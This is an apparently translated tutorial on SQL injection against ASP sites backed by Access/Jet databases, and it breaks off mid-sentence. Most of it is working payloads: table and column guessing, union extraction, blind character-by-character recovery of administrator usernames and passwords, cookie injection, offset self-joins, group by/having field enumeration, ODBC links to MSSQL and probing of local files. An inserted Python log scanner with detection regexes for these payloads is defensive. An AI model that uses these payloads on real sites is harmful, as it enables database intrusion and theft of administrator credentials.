I. Basics
Guessing the table name (the statement appended after "and"):
and exists (select * from table name)
Guessing a column name:
and exists (select field from table name)
The UNION method. Run order by before the union to find the column count; it is faster.
Union query:
select name, password, id from user union select user, pwd, uid from
If order by returns an error, the union can be performed twice:
and 1=2 union select 1,2,3,4,5 from table name union select 1,2,3,4,5 from table name
Specifying the table name:
and 1=2 union select 1,2,3,4,5 from table name
ASCII character-by-character decoding:
1. Guessing the length of a column value
Statement explanation:
and (select top 1 len(column name) from table name) > N
and (select top 1 len(column name) from table name) = N
where N is a number; the length of the column is found by changing N, for example:
and (select top 1 len(column name) from table name) > 1
and (select top 1 len(column name) from table name) > 6
If the page displays normally all the way up to 6 and returns an error at 7 (greater than 6, less than or equal to 7), the length of this column is 7.
Because "top 1" extracts the first record, to guess the second record use:
select top 1 len(column name) from table name
where column name not in (select top 1 column name from table name)
2. Guessing the user name and password by ASCII code
The asc() and mid() functions
Example: mid(column name, N, 1)
asc(mid(column name, N, 1)) returns the ASCII code of the Nth character of "column name".
Statement explanation:
and (select top 1 asc(mid(field, 1, 1)) from table name) = ASCII code (obtained with a conversion tool)
Range check statement:
"... between ... and ..."
Handling Chinese characters:
After ASCII conversion the value is negative, so use abs() to take the absolute value.
Example: and (select top 1 abs(asc(mid(field, 1, 1))) from table name) = ASCII code (obtained with a conversion tool)
ASCII character-by-character decoding, step by step:
1. Guessing the table name:
and (select count(*) from admin) <> 0
2. Guessing the column name:
and (select count(column name) from table name) <> 0
3. Guessing the number of administrator users:
and (select count(*) from table name) = 1
If the page returns normally, there is one record in the table.
4. Guessing the length of the administrator user name:
and (select len(column name) from table name) >= 1, >= 2, >= 3, >= 4 ...
5. Guessing the administrator user name:
and (select count(*) from table name where (asc(mid(column name, 1, 1)) between 30 and 130)) <> 0
Finally submit:
and (select asc(mid(column name, 1, 1)) from table name) = ASCII value
6. Guessing the administrator password:
By the same principle, replace the column name inside asc(mid(column name, ...)) in the preceding statements with PASSWORD to obtain the administrator password.
Search-box injection uses the following statements:
keyword% and 1=1 and %=%
keyword% and 1=2 and %=%
Replace "and 1=1" with the injection statement.
Cookie injection statements:
javascript:alert(document.cookie="id="+escape("44 and 1=1"));
javascript:alert(document.cookie="id="+escape("44 and 1=2"));
Statement explanation:
Guessing the length:
javascript:alert(document.cookie="id="+escape("44 and (select len(password) from admin)=16"))
Guessing the content:
javascript:alert(document.cookie="id="+escape("44 and (select asc(mid(username)) from admin)=97"))
II. Advanced
1. Access offset injection
Precondition: you know a table's name and one of its fields; usually the id field exists.
Suppose order by shows that the query outputs 20 columns. You need the number of fields in the admin table:
and 1=2 union select 1,2,3,4,5,6,7,8,* from admin errors; continue with
and 1=2 union select 1,2,3,4,5,6,7,8,9,* from admin, adding one at a time until the page returns normally.
For example, if and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,* from admin
returns normally, the admin table's fields may already be displayed, depending on how complex the admin table is and on luck.
If the page returns normally at 15, the admin table has 20-15 = 5 fields, and the self-join follows. An important condition for the self-join is:
admin field count * 2 < number of columns output by order by, so the self-join condition is quite strict.
union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id=b.id)
Using id as the join condition doubles the number of fields of the admin table. (admin as a inner join admin as b on a.id=b.id) is
a self-join of admin, so the table after from has twice as many fields; the first 10 + 2*5 = 20 fields are valid.
The * part gives username and password a greater chance of landing on a displayed position.
If they still do not appear, then:
union select 1,2,3,4,5,6,7,8,9,10,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
Is this statement valid? 10 + 2 + 5*2 = 22 > 20.
This is the crux and must be understood. The front side has 22 columns and the back side 20;
how can they match? Because a.id and b.id already occur inside *, the engine drops the duplicates.
Although the query results are the same, the order of the fields in * is shuffled, and two successive shifts are likely to move
username and password into the displayed positions.
What if that still does not succeed?
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)
2. having and group by statements
Access also supports having and group by. As everyone knows, these two statements are commonly used to enumerate fields
in MSSQL. In Access it is awkward; the cases are discussed here.
A: If the site's SQL query is select id, name, address from table name, i.e. it queries a specific list of fields,
we can brute-force it: productshow.asp?id=25 group by 1 having 1=1 (numeric type); for character
type: group by 1 having 1=1
Returned error:
Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression 'id' as part of an aggregate function.
The id field is revealed. Continue with productshow.asp?id=25 group by 1,id having 1=1
Returned error:
Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression 'email' as part of an aggregate function.
Then productshow.asp?id=25 group by 1,id,email having 1=1
B: If the site's original SQL is select * from product where id=" & ID & ", the preceding statement returns
the following error:
Microsoft JET Database Engine error 80040e21
Cannot group on fields selected with '*'.
/productshow.asp, line 18
In this case use productshow.asp?id=25 having sum(1)=1 (numeric type); character type: (having sum(1)=1)
Returned error:
Microsoft JET Database Engine error 80040e21
You tried to execute a query that does not include the specified expression 'id' as part of an aggregate function.
/productshow.asp, line 18
This exposes the id.
But this is very limited: only the first field, id, can be revealed; the others cannot. You can only guess blindly.
productshow.asp?id=25 and id=1 returns no error; productshow.asp?id=25 and name=1 returns an error:
Microsoft JET Database Engine error 80040e10
No value given for one or more required parameters.
/productshow.asp, line 18
3. Connecting to an MSSQL database
productshow.asp?id=25 and 1=2 union select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables
This returns the first table name of the master database.
The following table names are just as easy to get:
union select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables)
To check whether the connection works:
union select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=***;DataBase=master].information_schema.tables where 1=1
Returned error:
Microsoft JET Database Engine error 80004005
ODBC -- connection to SQL Server ****** failed.
If the error comes back after a long delay, the database server cannot be reached; if it comes back quickly with no delay,
the supplied account or password is wrong.
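A defender's log check for the payload shapes quoted on this page: the boolean-blind asc/mid and len probes and union selects of Part I, the group by/having enumeration and the [ODBC;...] linked-table strings of sections 2 and 3 above, and the file-path in clause of section 4 below. This is an added example, not code from the original page; the log lines, addresses and signature regexes are constructed for it.

```python
import re
from urllib.parse import unquote_plus
# Signatures for the Jet/Access injection shapes quoted on this page (constructed for this example).
SIGNATURES = {
    "tautology":    r"\band\s+1\s*=\s*[12]\b",
    "blind_probe":  r"select\s+(?:top\s+1\s+)?(?:abs\s*\(\s*)?(?:asc|len)\s*\(",
    "union_select": r"\bunion\s+(?:all\s+)?select\b",
    "having_enum":  r"\bgroup\s+by\b.*\bhaving\b|\bhaving\s+sum\s*\(",
    "odbc_link":    r"\[odbc;\s*driver\s*=",
    "jet_in_file":  r"\bfrom\s+\w+\s+in\s+['\"]?[a-z]:",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in SIGNATURES.items()}

def normalize(raw):
    """URL-decode twice (catches double encoding) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw))).strip()

def classify(value):
    """Names of the signatures matching one query-string or cookie value."""
    return {name for name, rx in COMPILED.items() if rx.search(normalize(value))}
# Constructed W3C-style log lines: date time c-ip method uri-stem uri-query cs(Cookie); "-" = empty.
LOG = """\
2010-03-01 10:00:01 10.0.0.5 GET /productshow.asp id=25+and+1%3D2+union+select+1,2,3,4,5+from+admin -
2010-03-01 10:00:02 10.0.0.5 GET /productshow.asp id=25+and+(select+top+1+len(password)+from+admin)%3E6 -
2010-03-01 10:00:03 10.0.0.5 GET /productshow.asp id=25+and+(select+top+1+asc(mid(username,1,1))+from+admin)%3D97 -
2010-03-01 10:00:04 10.0.0.9 GET /productshow.asp id=25+group+by+1,id+having+1%3D1 -
2010-03-01 10:00:05 10.0.0.9 GET /productshow.asp id=25+and+1%3D2+union+select+top+1+1,2,table_name+from+[ODBC;Driver%3DSQL+Server;UID%3Ddbo;PWD%3Dx;Server%3D10.0.0.1;DataBase%3Dmaster].information_schema.tables -
2010-03-01 10:00:06 10.0.0.7 GET /productshow.asp - id=44+and+1%3D1
2010-03-01 10:00:07 10.0.0.2 GET /productshow.asp id=26 -
"""

def scan_log(text):
    """One finding per request whose query string or cookie matches a signature."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        _date, time, ip, _method, stem, query, cookie = parts[:7]
        tags = set().union(*(classify(f) for f in (query, cookie) if f != "-"))
        if tags:
            findings.append({"time": time, "ip": ip, "stem": stem, "tags": sorted(tags)})
    return findings

def blind_probe_sources(findings, threshold=2):
    """Clients with repeated blind probes: Part I's per-character guessing is a burst of asc/mid and len requests."""
    counts = {}
    for f in findings:
        if "blind_probe" in f["tags"]:
            counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

The cookie column is decoded and scanned like the query string because the cookie-injection variant above carries the same payloads there.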
4. Mapping the local drive
Use the in clause, for example productshow.asp?id=25 and 1=2 union select * from admin in.
Returned error:
Microsoft JET Database Engine error 80004005
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
This query can be used to detect directories and files; it is useful for locating website directories.
For example: productshow.asp?id=25 and 1=2 union select * from admin in c:\windows\odbc.ini
Returned error:
Microsoft JET Datab